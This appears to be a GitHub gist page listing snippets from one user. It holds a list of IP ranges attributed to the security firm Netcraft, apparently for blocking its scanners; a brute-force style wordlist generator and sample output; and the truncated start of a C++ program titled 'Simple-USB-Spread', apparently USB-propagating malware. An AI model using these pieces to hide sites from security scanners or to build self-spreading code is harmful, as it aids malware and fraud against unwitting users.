Skip to content

Instantly share code, notes, and snippets.

# NETCRAFT IP RANGES
194.52.68.0-194.52.68.255
194.72.238.0-194.72.238.255
83.138.182.72-83.138.182.79
83.138.189.96-83.138.189.103
81.91.240.0-81.91.255.255
89.36.24.0-89.36.31.255
83.222.232.216-83.222.232.218
184.172.0.0-184.173.255.255
@3a1
3a1 / wordlist.py
Last active December 6, 2023 21:54
Wordlist Generator
import itertools
min_length = 3
max_length = 3
charset = "abcdefghijklmnopqrstuvwxyz0123456789-"
wordlist = [''.join(candidate) for candidate in itertools.product(charset, repeat=min_length)]
output_file_path = "wordlist.txt"
@3a1
3a1 / wordlist.txt
Last active January 2, 2024 18:31
wordlist.txt
qqq
qqw
qqe
qqr
qqt
qqy
qqu
qqi
qqo
qqp
@3a1
3a1 / main.cpp
Created April 20, 2024 18:17
Simple-USB-Spread
#include <iostream>
#include <windows.h>
#include <tchar.h>
#include <string>
#pragma comment(lib, "legacy_stdio_definitions.lib")
std::string allDrives;
char getRemovableDisk() {